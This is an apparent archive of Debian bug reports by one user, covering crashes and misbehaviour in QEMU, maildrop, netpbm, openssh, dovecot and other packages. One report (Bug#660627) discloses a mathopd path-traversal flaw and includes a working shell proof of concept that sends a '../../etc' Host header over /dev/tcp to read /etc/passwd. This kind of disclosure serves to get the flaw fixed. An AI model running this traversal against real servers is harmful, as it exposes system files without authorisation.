Bug#803909: Assertion `bm->bus->dma->aiocb == ((void *)0)' failed

2016-01-31 Thread Andrew Buckeridge - Private
Restarted VM and then allowed Windows 7 to start normally.
Was able to complete defrag C: /H /U /V /X in cmd dos box.
Not reproducible. Any interesting comments regarding assertion?
Same command line as before:

qemu-system-x86_64 -enable-kvm -cpu host -localtime -usb -boot c -drive \
-usbdevice tablet -net nic,vlan=0,model=rtl8139 -net user,vlan=0 \
-soundhw ac97 -m 2047M

Bug#803909: Assertion `bm->bus->dma->aiocb == ((void *)0)' failed

2016-01-31 Thread Andrew Buckeridge - Private
With just the C: drive. 

defrag C: /H /U /V /X in cmd dos box seems to upset it.
Was hoping to use this to clean up raw image before making it sparse.
These raw images can be placed on a USB stick.
Normally defrag is just a time waster.
Now using qcow2 for general use on desktop.

[ 1039.091722] kvm: zapping shadow pages for mmio generation wraparound

Linux pdc 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt20-1+deb8u3
(2016-01-17) x86_64 GNU/Linux

qemu-system-x86_64 -enable-kvm -cpu host -localtime -usb -boot c -drive \
-usbdevice tablet -net nic,vlan=0,model=rtl8139 -net user,vlan=0 \
-soundhw ac97 -m 2047M

Bug#803909: Assertion `bm->bus->dma->aiocb == ((void *)0)' failed

2015-11-02 Thread Andrew Buckeridge - Private
Package: qemu-system-x86
Version: 1:2.1+dfsg-12+deb8u4

qemu-system-x86_64 crashes after a while when assertion fails.
Running an install of Windows 7 Enterprise.

qemu-system-x86_64 -enable-kvm -cpu host -localtime -usb -boot c \
-fda fat:floppy:rw:a \
-drive file=win7.qcow2,if=ide,index=0,media=disk,format=qcow2,\
detect-zeroes=unmap,discard=unmap \
-drive file=win7e32.iso,if=ide,index=2,media=cdrom,format=raw \
-usbdevice tablet \
-net nic,model=rtl8139 \
-net user,hostfwd=tcp:,hostfwd=tcp:,\
hostfwd=tcp:,hostfwd=udp: \
-usbdevice disk:format=raw:usb.img \
-soundhw ac97 \
-m 2047M

qemu-system-x86_64: /build/qemu-e7wj_D/qemu-2.1+dfsg/hw/ide/pci.c:330:
bmdma_cmd_writeb: Assertion `bm->bus->dma->aiocb == ((void *)0)' failed.

Bug#800146: Can't load x32 binaries on amd64 system

2015-09-27 Thread Andrew Buckeridge - Private
Package: linux-image-3.16.0-4-amd64
Version: 3.16.7-ckt11-1+deb8u3
Severity: normal

Dear Maintainer,
I am able to run i386 and i686 binaries on my amd64 system, but not x32.

Steps to reproduce:

# apt-get install libc6-dev-x32

$ gcc -Os -mx32 -o /tmp/csv2tsv /usr/local/src/csv2tsv.c 
$ ldd /tmp/csv2tsv
not a dynamic executable
$ /tmp/csv2tsv
bash: /tmp/csv2tsv: cannot execute binary file: Exec format error

$ /libx32/ld-2.19.so 
bash: /libx32/ld-2.19.so: cannot execute binary file: Exec format error

I expected that I would be able to run x32 binaries with libc6-dev-x32
and libc6-x32 installed on an amd64 system, but as the loader won't load
this it is not going to work.

It looks like the kernel config prevents x32 binaries from loading.

This limitation breaks libc6-dev-x32 and libc6-x32 packages. However,
I can still run generic Pentium4
"-m32 -march=pentium4 -mtune=generic -msse3 -mfpmath=sse"
builds on amd64.

Is this related to CVE-2014-0038 ?

# Executable file formats / Emulations
# CONFIG_HAVE_AOUT is not set

Bug#798425: e2fsprogs ext4 man page typo says ext2 twice in list

2015-09-08 Thread Andrew Buckeridge - Private
Package: e2fsprogs
Version: 1.42.12-1.1
Severity: minor

Minor annoyance that probably no one notices. My fix:-

--- /tmp/ext4.5.orig2015-09-09 12:27:34.0 +0800
+++ /tmp/ext4.5 2015-09-09 12:27:40.0 +0800
@@ -6,7 +6,7 @@
 ext2 \- the second extended file system
-ext2 \- the third extended file system
+ext3 \- the third extended file system
 ext4 \- the fourth extended file system

Bug#563335: The crypt() in dietlibc returns des regardless of salt

2015-07-16 Thread Andrew Buckeridge - Private
The crypt() in dietlibc-dev is not the same as crypt() in glibc.

In checkpassword.c inserted the lines:
#define _GNU_SOURCE
#include alloca.h

I linked against glibc with -lcrypt and it works.

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Bug#785241: i386 installer works, but amd64 did not

2015-07-06 Thread Andrew Buckeridge - Private
I have an Acer C720P.

When I tried the amd64 installer via USB and it just rebooted the BIOS.
I was able to run the i386 installer, pull amd64 kernel image and boot
it from the built in flash drive. The johnlewis.ie FAQs say try another
distro or mem=some_value. The i386 Debian userland is now running fine.

I had installed John Lewis' option:

 1. Modify my Chromebook's ROM to run SeaBIOS exclusively
(and get rid of the scary screen).

I used debian-8.1.0-amd64-i386-netinst.iso installer from HD media.
The mbr-syslinux HD media image I made had both the amd64 and i386
versions of vmlinuz and initrd.gz in an MeS-DoS volume. I renamed the
i386 versions vmlinuz32 initrd32.gz. I booted those looked for the ISO
and it worked.

Had SeaBIOS-mbr-syslinux and something went wrong with amd64 USB boot.

I also tried flashing the amd64 boot.img.gz to whole USB device and it
also did not work.

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Bug#786851: maildrop: reformime -r8 is supposed to convert Q-P to 8bit

2015-05-29 Thread Andrew Buckeridge - Private
I have included two samples of QP:

One ending with .ms abuses QP to conceal long lines.
(The .ms is for MicroSoft not groff -ms which I like.)

This is not converted to 8bit.

One ending with .qp uses QP to encapsulate human readable plaintext.
(This encoding would only be useful where you really did have a channel
that was only 7bit clean and wished to send 8bit text.)

This is was converted to 8bit.

The problem with MicroSoft text is that long lines exceed the 78 or 80
chracater limit of plaintext and also opften exceed the 998 octet limit
of SMTP. However I have never seen 7bit or 998 octet limits with MTAs
in the wild. The simple solution would be to always convert to 8bit.

The real problem with MicroSoft text is that long lines are hard to
read. QP is abused to hide such text from content filters.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec a diam=
lectus. Sed sit amet ipsum mauris. Maecenas congue ligula ac quam viverra=
nec consectetur ante hendrerit. Donec et mollis dolor. Praesent et diam=
eget libero egestas mattis sit amet vitae augue. Nam tincidunt congue enim,=
ut porta lorem lacinia consectetur. Donec ut libero sed arcu vehicula=
ultricies a non tortor. Lorem ipsum dolor sit amet, consectetur adipiscing=
elit. Aenean ut gravida lorem. Ut turpis felis, pulvinar a semper sed,=
adipiscing id dolor. Pellentesque auctor nisi id magna consequat sagittis.=
Curabitur dapibus enim sit amet elit pharetra tincidunt feugiat nisl=
imperdiet. Ut convallis libero in urna ultrices accumsan. Donec sed odio=
eros. Donec viverra mi quis quam pulvinar at malesuada arcu rhoncus. Cum=
sociis natoque penatibus et magnis dis parturient montes, nascetur=
ridiculus mus. In rutrum accumsan ultricies. Mauris vitae nisi at sem=
facilisis semper ac in est.

Vivamus fermentum semper porta. Nunc diam velit, adipiscing ut tristique=
vitae, sagittis vel odio. Maecenas convallis ullamcorper ultricies.=
Curabitur ornare, ligula semper consectetur sagittis, nisi diam iaculis=
velit, id fringilla sem nunc vel mi. Nam dictum, odio nec pretium volutpat,=
arcu ante placerat erat, non tristique elit urna et turpis. Quisque mi=
metus, ornare sit amet fermentum et, tincidunt et orci. Fusce eget orci a=
orci congue vestibulum. Ut dolor diam, elementum et vestibulum eu,=
porttitor vel elit. Curabitur venenatis pulvinar tellus gravida ornare. Sed=
et erat faucibus nunc euismod ultricies ut id justo. Nullam cursus suscipit=
nisi, et ultrices justo sodales nec. Fusce venenatis facilisis lectus ac=
semper. Aliquam at massa ipsum. Quisque bibendum purus convallis nulla=
ultrices ultricies. Nullam aliquam, mi eu aliquam tincidunt, purus velit=
laoreet tortor, viverra pretium nisi quam vitae mi. Fusce vel volutpat=
elit. Nam sagittis nisi dui.

Suspendisse lectus leo, consectetur in tempor sit amet, placerat quis=
neque. Etiam luctus porttitor lorem, sed suscipit est rutrum non. Curabitur=
lobortis nisl a enim congue semper. Aenean commodo ultrices imperdiet.=
Vestibulum ut justo vel sapien venenatis tincidunt. Phasellus eget dolor=
sit amet ipsum dapibus condimentum vitae quis lectus. Aliquam ut massa in=
turpis dapibus convallis. Praesent elit lacus, vestibulum at malesuada et,=
ornare et est. Ut augue nunc, sodales ut euismod non, adipiscing vitae=
orci. Mauris ut placerat justo. Mauris in ultricies enim. Quisque nec est=
eleifend nulla ultrices egestas quis ut quam. Donec sollicitudin lectus a=
mauris pulvinar id aliquam urna cursus. Cras quis ligula sem, vel elementum=
mi. Phasellus non ullamcorper urna.

Class aptent taciti sociosqu ad litora torquent per conubia nostra, per=
inceptos himenaeos. In euismod ultrices facilisis. Vestibulum porta sapien=
adipiscing augue congue id pretium lectus molestie. Proin quis dictum nisl.=
Morbi id quam sapien, sed vestibulum sem. Duis elementum rutrum mauris sed=
convallis. Proin vestibulum magna mi. Aenean tristique hendrerit magna, ac=
facilisis nulla hendrerit ut. Sed non tortor sodales quam auctor elementum.=
Donec hendrerit nunc eget elit pharetra pulvinar. Suspendisse id tempus=
tortor. Aenean luctus, elit commodo laoreet commodo, justo nisi consequat=
massa, sed vulputate quam urna quis eros. Donec vel.
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Donec a diam lectu=
Sed sit amet ipsum mauris. Maecenas congue ligula ac quam viverra nec
consectetur ante hendrerit. Donec et mollis dolor. Praesent et diam eget
libero egestas mattis sit amet vitae augue. Nam tincidunt congue enim, ut
porta lorem lacinia consectetur. Donec ut libero sed arcu vehicula ultricie=
s a
non tortor. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aenean=
gravida lorem. Ut turpis felis, pulvinar a semper sed, adipiscing id dolor.
Pellentesque auctor nisi id magna consequat sagittis. Curabitur dapibus enim
sit amet elit pharetra tincidunt feugiat nisl imperdiet. Ut convallis libero
in urna ultrices accumsan. Donec sed odio eros. Donec viverra mi quis quam
pulvinar at 

Bug#786851: maildrop: reformime -r8 is supposed to convert Q-P to 8bit

2015-05-26 Thread Andrew Buckeridge - Private
The problem seems to be of the except in some situations kind.
It could be failing if the line is more than 78 characters or 998
octets, but this is not what you expect when you tell it to get rid of
QP by supplying the -r8 option. I have some samples that are
confidential so I will try and hand craft some that can reproduce the

 Like -r but also convert quoted-printable-encoded MIME sections to

 -r8 does the same thing, but also converts quoted-printable-encoded
  content to 8bit, except in some situations.

Man page reformime(1) and HTML

I still think its a bug.

The SMTP line length limit of 998 octets could just be ignored as you
do with 8BITMIME when SMTP only talks plain old SMTP. Try and send it

Historically SMTP parsed messages line at a time with buffer of say
1001 bytes. (The 1 at the end is for the '\0'.) However, if the buffer
does not end with a '\n' and you simply sent on as is long lines are
still correctly handled. You will still see the short line .\r\n that
terminates DATA. The fact that long lines can't be read is a human, not
an MTA issue. With humans the limit is 80 characters for Western and
possibly only 40 for CJK. If our .\r\n started at 1000 then we might
then erroneously terminate DATA. Could guard this with a flag set from
previous line.

 RFC 821 prohibits lines longer than 998 bytes, and requires that all
 servers be able to accept 998-byte lines. In practice, users sometimes
 send longer lines.
The problem is that those users conceal their unreadable email from the
filter with QP.

The old 8BITMIME is just sent anyway with plain old SMTP.

All 8BITMIME tells you to do is append the BODY=8BITMIME to the MAIL
command if you have any 8bit DATA.

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Bug#786851: maildrop: reformime -r8 is supposed to convert Q-P to 8bit

2015-05-25 Thread Andrew Buckeridge
Package: maildrop
Version: 2.7.1-3
Severity: important

Dear Maintainer,

Wanted to use script /usr/local/bin/mimetidy.sh to check email is readable:
exec 31
[ $(reformime -r8 | tee /dev/fd/3 | wc -L) -le 80 ]

Also tried processessing email with reformime -r8 message.eml | less -S

Still contains Q-P encoding.

I expected the Q-P encoding that is only ever used to conceal excessively
long lines to be removed.

-- System Information:
Debian Release: 8.0
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.16.0-4-amd64 (SMP w/8 CPU cores)
Locale: LANG=en_AU, LC_CTYPE=en_AU.ISO-8859-1 (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages maildrop depends on:
ii  courier-authlib  0.66.1-1+b1
ii  libc62.19-18
ii  libgcc1  1:4.9.2-10
ii  libgdbm3 1.8.3-13.1
ii  libpcre3 2:8.35-3.3
ii  libstdc++6   4.9.2-10

Versions of packages maildrop recommends:
ii  exim4-daemon-light [mail-transport-agent]  4.84-8

maildrop suggests no packages.

-- no debconf information

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Bug#718366: I get same with the R flat panel modes

2013-10-04 Thread Andrew Buckeridge
Package: arandr
Version: 0.1.6-1

I can't replace built in XxY modes so use additional R ones
calculated with:

cvt -r 1440 900 60
cvt -r 1400 1050 60

This is labelled 1440x900R as previous 1440x900 in use can not be
changed. Integer conversion (int()) stops on 'R' with error.

Need to match only first two groups of digits in mode as frequency and
flags do not matter. Split H on x and then split V on any non digit?
Any non-digit for H would also allow for '*, 'X', '×', etc.

   File /usr/lib/python2.7/dist-packages/screenlayout/xrandr.py, line 150, 
 in genexpr
 o.modes.append(Size(int(a) for a in d.strip().split( )[0].split(x)))
 ValueError: invalid literal for int() with base 10: '900R'

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Bug#712659: mkvmlinuz missing xxd from vim-common

2013-06-18 Thread Andrew Buckeridge
Package: mkvmlinuz
Version: 36

 Depends: bash (= 3), binutils, debconf (= 0.5) | debconf-2.0, libc6 (= 2.4)

I got hit with this on my Pegasos2 when upgrading to wheezy because I
run nvi and did not have vim-common installed. There is also hexdump
or hd command from bsdmainutils.

Now have 3.2.0-4-powerpc up running.
(Bug 627585 led to 630845 also with linux-image-3.0.0 may be related.)

Test for compression magic depends on xxd command from vim-common.

 299 if test -z $compressed; then
 300 if test `xxd -p -l2 $initrd` = 1f8b; then
 301 test -z $verbose || echo === $initrd is already gzip 
 302 do_cmd cp -p $initrd $work/initrd.gz
 303 if test $is_xz_supported  test $arch != prep; then
 304   test -z $verbose || echo === recompressing to xz
 305   zcat $initrd | $XZ -  $work/initrd.xz
 306 fi
 307 elif test `xxd -p -l6 $initrd` = fd377a585a00; then
 308 test -z $verbose || echo === $initrd is already xz 
 309 do_cmd cp -p $initrd $work/initrd.xz
 310 else
 311 test -z $verbose || echo === assuming $initrd was not 
 312 compressed=No
 313 fi
 314 fi

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Bug#606168: Bug #606168 - Parted complains about MBR modified by gptsync

2013-01-12 Thread Andrew Buckeridge
On Tue, 08 Jan 2013 13:27:09 -0500
Phillip Susi ps...@ubuntu.com wrote:

 tags 606168 + moreinfo
 Is there a problem with the original disk, or only on the truncated image?
Whole disk.

Parted expects protective MBR to have a single entry for GPT (the GPT
itself contains the partitions). However, gptsync also has MBR point to
partitions after the GPT. Note that partitions are off by one as MBR
still has entry for GPT. The GPT does not have an entry itself.

Gptsync is part of rEFIt used to run Debian GNU/Linux on Intel Mac

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Bug#692796: stunnel.conf: options = SSL_OP_CIPHER_SERVER_PREFERENCE: Illegal SSL option

2012-11-08 Thread Andrew Buckeridge
Package: stunnel4
Version: 3:4.29-1

I have not tagged severity. Is it a real security issue?

In my stunnel.conf I tried:--


It gave Illegal SSL option and did not start.

Trying to set SSL_CTX_set_options(3ssl) SSL_OP_CIPHER_SERVER_PREFERENCE.


In my stunnel.conf I also have:--

options = NO_SSLv2
options = SINGLE_DH_USE

ciphers = RC4-SHA:HIGH:!ADH

They are aware of this upstream.
May also be fixed.
 I guess you either use and old stunnel, or an old version of OpenSSL.

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Bug#692186: pnmtofiasco can't read valid PNM files created by netpbm

2012-11-02 Thread Andrew Buckeridge
Package: netpbm
Version: 2:10.0-12.2+b1

pnmtofiasco: bad magic number - not a ppm, pgm, or pbm file
with output of pnmnorm, but this same output was accepted by pnmtojpeg

Steps to reproduce:

# pngtopnm file.png | pnmnorm -bpercent 1 -wpercent 1 | pnmtojpeg --quality=70 
--dct=float --progressive --optimize --sample=2x2 file.jpg

JPEG works.

# pngtopnm file.png | pnmnorm -bpercent 1 -wpercent 1 | pnmtofiasco file.wfa

 pnmtofiasco: bad magic number - not a ppm, pgm, or pbm file

# ls -l file.*
-rw-r--r-- 1 andrewb andrewb 39448 Nov  3 11:18 file.jpg
-rw-r--r-- 1 andrewb andrewb 42249 Nov  3 11:17 file.png
-rw-r--r-- 1 andrewb andrewb 0 Nov  3 11:19 file.wfa

See https://bugzilla.redhat.com/show_bug.cgi?id=227283

 Width and height of images must be even numbers.

If I make the input an even numbered seekable file, I still get no

 *** glibc detected *** pnmtofiasco: corrupted double-linked list: 0x1067e0d8 
 === Backtrace: =
 === Memory map: 
 0010-00103000 r-xp  00:00 0  [vdso]
 0fd5f000-0fec9000 r-xp  03:02 214468 /lib/libc-2.11.3.so
 0fec9000-0fed9000 ---p 0016a000 03:02 214468 /lib/libc-2.11.3.so
 0fed9000-0fedd000 r--p 0016a000 03:02 214468 /lib/libc-2.11.3.so
 0fedd000-0fede000 rw-p 0016e000 03:02 214468 /lib/libc-2.11.3.so
 0fede000-0fee1000 rw-p  00:00 0 
 0fef1000-0ff9b000 r-xp  03:02 214472 /lib/libm-2.11.3.so
 0ff9b000-0ffab000 ---p 000aa000 03:02 214472 /lib/libm-2.11.3.so
 0ffab000-0ffae000 r--p 000aa000 03:02 214472 /lib/libm-2.11.3.so
 0ffae000-0ffaf000 rw-p 000ad000 03:02 214472 /lib/libm-2.11.3.so
 0ffbf000-0ffdd000 r-xp  03:02 197624 /usr/lib/libnetpbm.so.10.0
 0ffdd000-0ffed000 ---p 0001e000 03:02 197624 /usr/lib/libnetpbm.so.10.0
 0ffed000-0fff rw-p 0001e000 03:02 197624 /usr/lib/libnetpbm.so.10.0
 1000-1002b000 r-xp  03:02 347315 /usr/bin/pnmtofiasco
 1003b000-1003c000 rw-p 0002b000 03:02 347315 /usr/bin/pnmtofiasco
 1003c000-10071000 rwxp  00:00 0 
 105f3000-106be000 rwxp  00:00 0  [heap]
 4800-4802 r-xp  03:02 214480 /lib/ld-2.11.3.so
 4802-48021000 rw-p  00:00 0 
 48021000-48022000 r--p 00021000 03:02 214480 /lib/ld-2.11.3.so
 48022000-48023000 rw-p 00022000 03:02 214480 /lib/ld-2.11.3.so
 48041000-483c5000 rw-p  00:00 0 
 4840-48421000 rw-p  00:00 0 
 48421000-4850 ---p  00:00 0 
 bfda7000-bfdbc000 rw-p  00:00 0  [stack]

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Bug#660627: Serious if you change config

2012-07-27 Thread Andrew Buckeridge
Quite easy to reproduce with ksh script attached.

HTTP Host is not checked in the DNS to see if it matches socket.
This would be expensive. Checking Host against glob would be faster.

If config could match /** or **..** in domains then it would be okay,
but it did not seem to match. ** should match any including '/'.
However, Host is not globbed. The only fix is to have multiple
Virtual sections for each document root with Host entries for each HTTP
Host. I.e. you must use the exact HTTP Host.

Do not use Location /var/www/* as this matches any arbitrary HTTP Host.

In example you could spam users in /etc/password and say bad things
about admin.

/var/log/mathopd/access.log   -   Sat Jul 28 09:29:39 2012../../etc   80
   GET /passwd -   HTTP/1.1200 60  -   -

# Superfluous carriage return may be required
my_echo() { printf %b\r\n $*; }

test -n $2 || set -- ../../etc /passwd

exec 3/dev/tcp/localhost/80

my_echo GET $2 HTTP/1.1
my_echo Host: $1
my_echo Connection: close
} 3

while read -r LINE
printf %s\n $LINE
done 3

Bug#673989: Timestamps can be fixed to solve #353744 and #174038 of sysklogd

2012-05-22 Thread Andrew Buckeridge
Package: syslog-ng
Version: 3.1.3-3
Severity: wishlist

See also #353744 and #174038 of sysklogd.

A small change to syslog-ng could make logs useful.
Could then use as default to solve #353744 and #174038.

# First, set some global options.
options {
  # rfc3339|iso fix bug #353744

This will the ensure that dates are not ambiguous and mostly monotonic.

Can then query large logs efficiently with LC_COLLATE=C look -b.
Results can then be filtered, joined, etc.

Log analysers should also be fixed to work with ordered dates.

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Bug#649467: Sets 25 s timeout without option and -1 does not work

2011-11-21 Thread Andrew Buckeridge
Package: rlpr
Version: 2.05-4

The man page says that --timeout= defaults to 3 s, but it defaults to
25 s in the program. Even 25 s is way too short and causes a timeout.

A more logical default would be -1 which according to the man page
means never. However, a value of -1 as documented also causes an error.

With --timeout=-1 I get: --

rlpr: warning: cannot bind to privileged port: lpd may reject
rlpr: error: connect to Invalid argument
rlpr: fatal error: client_open(): cannot connect to lpd

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Bug#649467: LPD timeout is harmful

2011-11-21 Thread Andrew Buckeridge
Direct socket printing (such as HP JetDirect on 9100/tcp) by accepting
only one TCP connection on the socket exploits the rate adaptation and
logical end of file inherent in TCP. With this scheme it can start
processing the input as soon as it starts to receive it.

The RFC 1179 Line Printer Daemon protocol traditionally accepted
multiple jobs which it received before they were printed. I.e.
Simultaneous Peripheral Operations On-Line (according to AST) to
prevent user programs tying up the single line printer.

The real problem now (with other LPD implementations and CUPS) is
queues tying up the sysadmin.

Now LPD is built in to printers and large PostScript (vector or super
massive PCL uncompressed bitmap) jobs are being SPOOLed and then
processed in memory rather than on mass storage.

The problem with LPD is resources are finite and there is no official
way of limiting the rate at which jobs are submitted.

A LPD may have these one byte replies.

\000 Accepted
\001 Not accepting new jobs, tell sysadmin it has died again
\002 Counts exceed allocated or available space, try later
\003 Bad job format

Rather than return \002 it may also just stop reading the socket until
space is available again. This must always be done if it only finds out
in the middle of receiving a print job. (Once picked up a job must be
completed until logical end of file. You don't want to permanently
block these.)

Note that RFC 1179 only mentions zero or non-zero replies. There is no
mention of the \002 reply or rate adaptation.

Rejection including \002 may cause other LPDs to stop accepting.
For this reason blocking the socket is common.

A default timeout of 3 s would be 8 h and 20 min and may work.
The user can always interrupt or kill it.

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Bug#644130: openssh-server: Sets DISPLAY to wrong value

2011-10-03 Thread Andrew Buckeridge
Package: openssh-server
Version: 1:5.5p1-6
Severity: normal

If I ssh -X into my machine chrp from n50.bgcaus.com DISPLAY is
bogus. However, if I change DISPLAY X client will run.

 andrewb@chrp:~$ echo $DISPLAY
 andrewb@chrp:~$ xclock
 Error: Can't open display: n50.bgcaus.com:0.0
 andrewb@chrp:~$ DISPLAY=localhost:10.0 xclock

Where did it get the bogus DISPLAY variable from?

-- System Information:
Debian Release: 6.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: powerpc (ppc)

Kernel: Linux 2.6.32-5-powerpc
Locale: LANG=en_AU, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages openssh-server depends on:
ii  adduser 3.112+nmu2   add and remove users and groups
ii  debconf [debconf-2. Debian configuration management sy
ii  dpkg1.15.8.11Debian package management system
ii  libc6   2.11.2-10Embedded GNU C Library: Shared lib
ii  libcomerr2  1.41.12-4stable1 common error description library
ii  libgssapi-krb5-21.8.3+dfsg-4squeeze1 MIT Kerberos runtime libraries - k
ii  libkrb5-3   1.8.3+dfsg-4squeeze1 MIT Kerberos runtime libraries
ii  libpam-modules  1.1.1-6.1Pluggable Authentication Modules f
ii  libpam-runtime  1.1.1-6.1Runtime support for the PAM librar
ii  libpam0g1.1.1-6.1Pluggable Authentication Modules l
ii  libselinux1 2.0.96-1 SELinux runtime shared libraries
ii  libssl0.9.8 0.9.8o-4squeeze2 SSL shared libraries
ii  libwrap07.6.q-19 Wietse Venema's TCP wrappers libra
ii  lsb-base3.2-23.2squeeze1 Linux Standard Base 3.2 init scrip
ii  openssh-blacklist   0.4.1list of default blacklisted OpenSS
ii  openssh-client  1:5.5p1-6secure shell (SSH) client, for sec
ii  procps  1:3.2.8-9/proc file system utilities
ii  zlib1g  1: compression library - runtime

Versions of packages openssh-server recommends:
ii  openssh-blacklist-extra   0.4.1  list of non-default blacklisted Op
ii  xauth 1:1.0.4-1  X authentication utility

Versions of packages openssh-server suggests:
pn  molly-guard   none (no description available)
pn  rssh  none (no description available)
pn  ssh-askpass   none (no description available)
pn  ufw   none (no description available)

-- debconf information:
  ssh/new_config: true
* ssh/use_old_init_script: true
  ssh/disable_cr_auth: false

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Bug#641698: xpdf: Hangs with blank screen when used as iceape helper

2011-09-15 Thread Andrew Buckeridge
Package: xpdf
Version: 3.02-12
Severity: normal

It does not consume CPU like #231208, but just looks like its dealocked.

If I clean the environment the problem goes away.

#/usr/local/bin/xpdf wrapper for /usr/bin/xpdf
exec env -i DISPLAY=$DISPLAY XAUTHORITY=$XAUTHORITY /usr/bin/xpdf $@

Iceape also leaves loads of FDs open in child.

-- System Information:
Debian Release: 6.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: powerpc (ppc)

Kernel: Linux 2.6.32-5-powerpc
Locale: LANG=en_AU, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages xpdf depends on:
ii  lesstif2  1:0.95.2-1 OSF/Motif 2.1 implementation relea
ii  libc6 2.11.2-10  Embedded GNU C Library: Shared lib
ii  libgcc1   1:4.4.5-8  GCC support library
ii  libpoppler5   0.12.4-1.2 PDF rendering library
ii  libstdc++64.4.5-8The GNU Standard C++ Library v3
ii  libx11-6  2:1.3.3-4  X11 client-side library
ii  libxt61:1.0.7-1  X11 toolkit intrinsics library

Versions of packages xpdf recommends:
ii  gsfonts-x11   0.21   Make Ghostscript fonts available t
ii  poppler-data  0.4.3-1Encoding data for the poppler PDF 
ii  poppler-utils 0.12.4-1.2 PDF utilitites (based on libpopple

xpdf suggests no packages.

-- no debconf information

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Bug#641247: dovecot-imapd: Get IMAP Error: fchown

2011-09-12 Thread Andrew Buckeridge
On Mon, 12 Sep 2011 10:08:58 +0300
Timo Sirainen t...@iki.fi wrote:

 On 12.9.2011, at 7.34, Andrew Buckeridge wrote:
  2011-09-12 11:37:03 IMAP(???): Error: 
  fchown(/var/lib/dovecot/control/9998/.INBOX/dovecot-uidlist.tmp, -1, 
  9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
  based on /export/home/???/Maildir)
 Dovecot copies the Maildir's permissions when creating any new files. This is 
 required for shared mailboxes to work correctly. So your possibilities are to 
So a feature (I didn't need) not a bug.

 a) chmod 0700 /export/home/???/Maildir

Perhaps I went over the top with paranoid:
chmod go-rwxst -R /export/home/???/Maildir
chgrp bgcuser -R /export/home/???/Maildir

This took a while on NAS.

Once I managed to get users to disconnect and reconnect the
problem went away. They were using the FD for their open Maildir.
 b) Give Dovecot access to mailusers group: mail_access_groups = mailusers
The group mailusers was legacy that we never implemented on LDAP.
However, It did not effect dovecot 1.0 from lenny.
It was going to be used as exim4 ACL to filter RCPT as not all
LDAP users use email.

May get tagged wontfix or closed by Debian jaldhar-dovecot.

Would be nice if shared mailboxes could just use mode 03771.

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Bug#641247: dovecot-imapd: Get IMAP Error: fchown

2011-09-11 Thread Andrew Buckeridge
Package: dovecot-imapd
Version: 1:1.2.15-7
Severity: important

User can not create folders or save email.

The umask option to mitigate this problem has been removed.

-- System Information:
Debian Release: 6.0.2
  APT prefers stable
  APT policy: (800, 'stable')
Architecture: i386 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_AU.ISO-8859-1, LC_CTYPE=en_AU.ISO-8859-1 (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages dovecot-imapd depends on:
ii  dovecot-common  1:1.2.15-7   secure mail server that supports m
ii  libc6   2.11.2-10Embedded GNU C Library: Shared lib
ii  libldap-2.4-2   2.4.23-7.2   OpenLDAP libraries
ii  libssl0.9.8 0.9.8o-4squeeze1 SSL shared libraries

dovecot-imapd recommends no packages.

dovecot-imapd suggests no packages.

-- no debconf information

Log file with usernames replaced with ???.

2011-09-12 11:37:03 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/9998/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:04 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/9878/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:05 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9703/.INBOX/dovecot.index.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:05 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9703/.INBOX/dovecot.index.cache.lock, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:05 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9703/.INBOX/dovecot.index.cache.lock, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:06 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/9986/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:06 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9986/.INBOX/dovecot.index.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:06 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9986/.INBOX/dovecot.index.cache.lock, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:07 IMAP(???): Error: 
fchown(/var/lib/dovecot/indexes/9986/.INBOX/dovecot.index.cache.lock, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:07 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10164/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
2011-09-12 11:37:07 IMAP(???): Error: 
fchown(/var/lib/dovecot/control/10050/.INBOX/dovecot-uidlist.tmp, -1, 
9111(mailusers)) failed: Operation not permitted (egid=9000(bgcuser), group 
based on /export/home/???/Maildir)
